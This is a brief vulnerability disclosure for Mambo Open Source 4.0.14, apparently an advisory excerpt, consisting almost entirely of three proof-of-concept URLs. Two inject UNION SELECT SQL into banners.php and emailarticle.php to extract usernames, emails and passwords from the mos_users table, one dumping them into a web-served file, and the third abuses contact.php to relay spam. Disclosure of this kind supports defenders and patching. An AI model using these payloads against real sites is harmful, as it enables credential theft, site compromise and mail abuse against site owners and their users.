Multiple Mambo Open Source 4.0.14 Server Vulnerabilities

Multiple Mambo Open Source 4.0.14 Server Vulnerabilities

The following proof of concept has been provided:

http://www.example.com/mambo/banners.php?op=click&bid=100 UNION select password from mos_users where 1=1 into outfile 'c:/apache2/htdocs/mos.txt'

http://www.example.com/mambo/emailfriend/emailarticle.php?submit=submit&email=example@example.com&youremail=example@example.com&id=100 UNION select username,email,password from mos_users where id=1

http://localhost/mambo/contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=example@example.com&sitename=www.example.com